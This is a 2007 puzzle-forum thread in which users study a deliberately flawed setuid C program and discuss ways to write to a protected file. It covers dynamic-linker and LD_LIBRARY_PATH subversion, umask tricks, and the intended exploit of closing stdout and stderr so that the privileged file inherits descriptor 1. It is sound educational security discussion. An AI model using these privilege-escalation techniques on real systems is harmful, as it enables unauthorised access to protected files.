Author |
Topic: Hack this professors code... (Read 962 times) |
|
Aryabhatta
Uberpuzzler
Gender: 
Posts: 1321
|
 |
Hack this professors code...
« on: Oct 24th, 2007, 10:54pm » |
 Quote  Modify
|
All the security related threads reminded me of the good old days... 
Here is a hacking puzzle:
Your Linux SunOS professor (login name prof) as an assignment has set up a hacking puzzle for your class.
With the C source code below, he has created a setuid executable (setuid to his login) which can be used to update the comments.txt file which is writable only by him. The allowed.txt file is readable only by him and he has put in some usernames and (corresponding) passwords in that.
He challenges you to use the setuid executable to add a comment (of your choice) to the comments.txt file. Can it be done?
Here is the code:
int checkalloweduser(FILE *fp, char *name, char *pass)
{
/* Assume secure code (I was too lazy to write this)*/
/* returns 1 if username,password in file, else 0 */
return 0;
}
int safe_gets(char *buf, int size)
{
int i = 0;
int c;
int flag = 0;
while ( i < size-1)
{
c = getchar();
if (c == EOF || c == '\n')
{
flag = 1;
break;
}
buf[i] = c;
i++;
}
buf[i] = 0;
return flag;
}
int main(int argc, char **argv)
{
char name[16];
char pass[16];
char comment[64];
char allowed[] = "/users/prof/allowedlist.txt";
/* File containing list of people allowed to comment */
char comments[] = "/users/prof/comments.txt";
/* Priviledged comments file */
FILE *fp_allowed = NULL;
FILE *fp_comments = NULL;
printf("Enter Username: ");
if (!safe_gets(name, 16))
{
exit(1);
}
if (!safe_gets(pass,16))
{
exit(1);
}
fp_comments = fopen(comments, "a+");
fp_allowed = fopen(allowed, "r");
if (!fp_comments || !fp_allowed)
{
exit(1);
}
if (checkalloweduser(fp_allowed, name, pass))
{
printf("Enter comment: ");
if (!safe_gets(comment, 64))
{
exit(1);
}
fprintf(fp_comments, "%s\n", comment);
exit(1);
}
else
{
printf("%s %s\n", name, pass);
printf("Not valid. Ha!\n");
printf("Bye\n");
exit(2);
}
return 0;
}
|
| « Last Edit: Oct 26th, 2007, 12:04pm by Aryabhatta » |
 IP Logged |
|
|
|
SMQ
wu::riddles Moderator
Uberpuzzler
Gender:
Posts: 2084
|
|
Re: Hack this professors code...
« Reply #1 on: Oct 25th, 2007, 9:50am » |
Quote Modify
|
Two possibilities, both relying on situations not explicitly given in the problem statement:
1) If he has compiled the program with dynamic linking, depending on the recentness of the host OS, there may be ways of subverting the dynamic linker (by changing LD_LIBRARY_PATH to point to a hacked libc.so, or creating a substitute ld executable earlier in the path, for instance) to obtain a command shell with his privileges.
2) If he has neglected to create the comments.txt file, the fopen(comments, "a+") command will create it. By modifying the default umask an attacker could arrange to have it created world-writable.
Other than that -- although the safe_gets function is suspect just on general principle -- I don't see any exploitable conditions. The only other oddity I see is that comments is opened "a+" (read/write) rather than just "a" (write-only), but I don't see any way to turn that to an advantage.
--SMQ
|
|
IP Logged |
--SMQ
|
|
|
Aryabhatta
Uberpuzzler
Gender:
Posts: 1321
|
|
Re: Hack this professors code...
« Reply #2 on: Oct 25th, 2007, 9:57am » |
Quote Modify
|
on Oct 25th, 2007, 9:50am, SMQ wrote:Two possibilities, both relying on situations not explicitly given in the problem statement:
1) If he has compiled the program with dynamic linking, depending on the recentness of the host OS, there may be ways of subverting the dynamic linker (by changing LD_LIBRARY_PATH to point to a hacked libc.so, or creating a substitute ld executable earlier in the path, for instance) to obtain a command shell with his privileges.
2) If he has neglected to create the comments.txt file, the fopen(comments, "a+") command will create it. By modifying the default umask an attacker could arrange to have it created world-writable.
Other than that -- although the safe_gets function is suspect just on general principle -- I don't see any exploitable conditions. The only other oddity I see is that comments is opened "a+" (read/write) rather than just "a" (write-only), but I don't see any way to turn that to an advantage.
--SMQ |
|
For setuid executables, I believe LD_LIBRARY_PATH is ignored (except on very old systems). I am not sure though, it has been a long time. Anyway, assume static linkage if you will.
The umask idea is good (partial credit  ), but the file has already been created.
|
| « Last Edit: Oct 25th, 2007, 10:17am by Aryabhatta » |
IP Logged |
|
|
|
towr
wu::riddles Moderator
Uberpuzzler
Some people are average, some are just mean.
Gender:
Posts: 13730
|
|
Re: Hack this professors code...
« Reply #3 on: Oct 25th, 2007, 10:10am » |
Quote Modify
|
The name and password strings don't same to be protected against entering something like "%s%s%s%s%s", which could make printf misbehave.
I don't see how to get anything useful out of it, though.
|
|
IP Logged |
Wikipedia, Google, Mathworld, Integer sequence DB
|
|
|
Aryabhatta
Uberpuzzler
Gender:
Posts: 1321
|
|
Re: Hack this professors code...
« Reply #4 on: Oct 25th, 2007, 10:19am » |
Quote Modify
|
on Oct 25th, 2007, 10:10am, towr wrote:The name and password strings don't same to be protected against entering something like "%s%s%s%s%s", which could make printf misbehave.
I don't see how to get anything useful out of it, though. |
|
I think all cases of printf use their own format string so even if we give %s as name etc, it will still behave i think, but anything is possible. This puzzle could have multiple solutions...
|
|
IP Logged |
|
|
|
Aryabhatta
Uberpuzzler
Gender:
Posts: 1321
|
|
Re: Hack this professors code...
« Reply #5 on: Oct 26th, 2007, 12:04pm » |
Quote Modify
|
It seems like the exploit I was thinking about does not work in most OSes these days (but it was prevalent a few years back, sorry its been a long time). I have changed the OS in the original post.
Since I screwed up, a hint is in order:
0,1,2
|
| « Last Edit: Oct 26th, 2007, 12:06pm by Aryabhatta » |
IP Logged |
|
|
|
Grimbal
wu::riddles Moderator
Uberpuzzler
Gender:
Posts: 7527
|
|
Re: Hack this professors code...
« Reply #6 on: Oct 27th, 2007, 10:24am » |
Quote Modify
|
It is a bit suspicious that the comments file is opened before the user and password validation and is never closed.
On UNIX it is possible to fork a new process that shares the file table, in a way that one process can open a file for another process.
So the idea was to create two processes sharing a file table, execute the 'prof' program in one process and use the open file in the other process. I managed to create the 2 processes with clone(), but I couldn't execute the prof program using execl() and keep the same file table. I don't see the 2 files from the prof program open in the first process.
But I tried that in Linux and I see now that Linux has been excluded.
|
| « Last Edit: Oct 27th, 2007, 10:34am by Grimbal » |
IP Logged |
|
|
|
Aryabhatta
Uberpuzzler
Gender:
Posts: 1321
|
|
Re: Hack this professors code...
« Reply #7 on: Oct 27th, 2007, 12:26pm » |
Quote Modify
|
Good try Grimbal, but I am not sure if your approach works on SunOS also.
Let me try a Linux version of the exploit I was thinking. If it works I will let you guys know.
[edit] It does not work on Linux, and the one I have is at least 3-4 years old
Ok. Here is the exploit which I had in mind, sorry that it has become outdated now. Sorry for the bad question.
Before execing the setuid process, close stdout and stderr.
When the professor's program opens the comments file, it gets the file descriptor 1 (corresponding to stdout) and any printf will now go to that file, as printf writes to file descriptor 1.
It is strange that SunOS (supposedly) still has that bug, in 2007.
[/edit]
|
| « Last Edit: Oct 27th, 2007, 12:58pm by Aryabhatta » |
IP Logged |
|
|
|
|
RIDDLES SITE
WRITE MATH!
Home 
Help 
Search 
Members 
Login 
Register
Reply
Notify of replies
Send Topic
Print